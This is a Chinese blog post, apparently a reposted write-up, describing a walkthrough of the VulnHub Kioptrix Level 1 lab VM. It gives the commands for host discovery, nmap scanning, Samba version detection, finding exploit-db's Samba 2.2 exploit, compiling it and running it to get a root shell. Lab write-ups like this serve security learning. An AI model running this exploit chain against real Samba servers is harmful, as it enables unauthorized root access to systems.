记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

vulnhub之kioptrix的实践

2020-10-18 19:05

本周末实践的是vulnhub的kioptrix镜像,这个镜像比较简单,

下载地址,https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar,

解压后一看就是vmware的虚机,当然就用workstation打开,

启动靶机,从console上没有看到ip地址,还是得自己去扫,

启动kali攻击机,先做地址扫描,

sudo netdiscover -r 192.168.1.0/24,

拿到靶机地址,192.168.1.100,接着做端口扫描,

sudo nmap -sS -sV -T5 -A -p- 192.168.1.100,

看到靶机开了ssh,http,samba,直接看samba,

先做个版本扫描,use auxiliary/scanner/smb/smb_version,

拿到samba的版本号,2.2.1a,接着就可以对其进行漏洞利用搜索,

searchsploit samba 2.2,

搜到的比较多,挑个方便合适的用,远程代码执行,还是c的代码,

把PoC代码文件拷贝到本地,

cp /usr/share/exploitdb/exploits/multiple/remote/10.c ./,

编译成可执行文件,gcc 10.c -o samba,

现在执行一下看看怎么用,还比较简单,加个平台参数就可以了,

最后执行命令拿到shell,./samba -b 0 192.168.1.100,

拿到的shell直接就是root,都不用再想办法提权了,发现ifconfig,ip addr,hostname -i都用不了,也就只能hostname确认是靶机。


知识来源: https://mp.weixin.qq.com/s?__biz=MzA3MjM5MDc2Nw==&mid=2650746031&idx=1&sn=c5049fd77ba6822276e2fe5aec744dc9

阅读:7637 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“vulnhub之kioptrix的实践”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云